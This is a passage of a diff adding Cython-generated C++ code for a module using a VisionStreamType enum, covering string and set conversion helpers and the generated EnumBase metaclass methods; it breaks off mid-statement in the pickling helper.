__Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyStr_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyBytes_string_to_py_std__in_string", 0); + + /* "string.to_py":50 + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyByteArray_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":49 + * + * @cname("__pyx_convert_PyBytes_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyBytes_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyBytes_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyBytes_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyByteArray_string_to_py_std__in_string", 0); + + /* "string.to_py":56 + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyByteArray_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":55 + * + * @cname("__pyx_convert_PyByteArray_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyByteArray_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyByteArray_FromStringAndSize(s.data(), s.size()) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyByteArray_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "set.to_py":166 + * + * @cname("__pyx_convert_set_to_py_enum__VisionStreamType") + * cdef object __pyx_convert_set_to_py_enum__VisionStreamType(const cpp_set[X]& s): # <<<<<<<<<<<<<< + * return {v for v in s} + * + */ + +static PyObject *__pyx_convert_set_to_py_enum__VisionStreamType(std::set const &__pyx_v_s) { + enum VisionStreamType __pyx_7genexpr__pyx_v_v; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + std::set ::const_iterator __pyx_t_2; + enum VisionStreamType __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_set_to_py_enum__VisionStreamType", 0); + + /* "set.to_py":167 + * @cname("__pyx_convert_set_to_py_enum__VisionStreamType") + * cdef object __pyx_convert_set_to_py_enum__VisionStreamType(const cpp_set[X]& s): + * return {v for v in s} # <<<<<<<<<<<<<< + * + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PySet_New(NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_v_s.begin(); + for (;;) { + if (!(__pyx_t_2 != __pyx_v_s.end())) break; + __pyx_t_3 = *__pyx_t_2; + ++__pyx_t_2; + __pyx_7genexpr__pyx_v_v = __pyx_t_3; + __pyx_t_4 = __Pyx_PyInt_From_enum__VisionStreamType(__pyx_7genexpr__pyx_v_v); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(PySet_Add(__pyx_t_1, (PyObject*)__pyx_t_4))) __PYX_ERR(1, 167, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + } /* exit inner scope */ + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "set.to_py":166 + * + * @cname("__pyx_convert_set_to_py_enum__VisionStreamType") + * cdef object __pyx_convert_set_to_py_enum__VisionStreamType(const cpp_set[X]& s): # <<<<<<<<<<<<<< + * return {v for v in s} + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("set.to_py.__pyx_convert_set_to_py_enum__VisionStreamType", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":17 + * @cython.internal + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): # <<<<<<<<<<<<<< + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + */ + +/* Python wrapper */ +static int __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__(PyObject *__pyx_v_cls, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__(PyObject *__pyx_v_cls, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + PyObject *__pyx_v_parents = 0; + PyObject *__pyx_v_dct = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,&__pyx_n_s_parents,&__pyx_n_s_dct,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_parents)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, 1); __PYX_ERR(1, 17, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dct)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 17, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, 2); __PYX_ERR(1, 17, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 17, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_name = values[0]; + __pyx_v_parents = values[1]; + __pyx_v_dct = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 17, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls), __pyx_v_name, __pyx_v_parents, __pyx_v_dct); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name, PyObject *__pyx_v_parents, PyObject *__pyx_v_dct) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "EnumBase":18 + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) # <<<<<<<<<<<<<< + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyType_Type)), __pyx_n_s_init); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 18, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[5] = {__pyx_t_3, ((PyObject *)__pyx_v_cls), __pyx_v_name, __pyx_v_parents, __pyx_v_dct}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 18, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":19 + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() # <<<<<<<<<<<<<< + * def __iter__(cls): + * return iter(cls.__members__.values()) + */ + __Pyx_INCREF(__Pyx_OrderedDict); + __pyx_t_2 = __Pyx_OrderedDict; __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_3, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 19, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + if (__Pyx_PyObject_SetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members, __pyx_t_1) < 0) __PYX_ERR(1, 19, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":17 + * @cython.internal + * cdef class __Pyx_EnumMeta(type): + * def __init__(cls, name, parents, dct): # <<<<<<<<<<<<<< + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":20 + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): # <<<<<<<<<<<<<< + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__(PyObject *__pyx_v_cls); /*proto*/ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__(PyObject *__pyx_v_cls) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__iter__ (wrapper)", 0); + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__iter__", 0); + + /* "EnumBase":21 + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): + * return iter(cls.__members__.values()) # <<<<<<<<<<<<<< + * def __getitem__(cls, name): + * return cls.__members__[name] + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_values); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_2)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_2, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "EnumBase":20 + * type.__init__(cls, name, parents, dct) + * cls.__members__ = __Pyx_OrderedDict() + * def __iter__(cls): # <<<<<<<<<<<<<< + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__iter__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":22 + * def __iter__(cls): + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): # <<<<<<<<<<<<<< + * return cls.__members__[name] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__(PyObject *__pyx_v_cls, PyObject *__pyx_v_name); /*proto*/ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__(PyObject *__pyx_v_cls, PyObject *__pyx_v_name) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_cls), ((PyObject *)__pyx_v_name)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "EnumBase":23 + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): + * return cls.__members__[name] # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_cls), __pyx_n_s_members); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_name); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "EnumBase":22 + * def __iter__(cls): + * return iter(cls.__members__.values()) + * def __getitem__(cls, name): # <<<<<<<<<<<<<< + * return cls.__members__[name] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumMeta.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = () # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_v_state = __pyx_empty_tuple; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = () + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = () + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = False + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = () + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = False # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + */ + /*else*/ { + __pyx_v_use_setstate = 0; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = False + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = False + * if use_setstate: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject 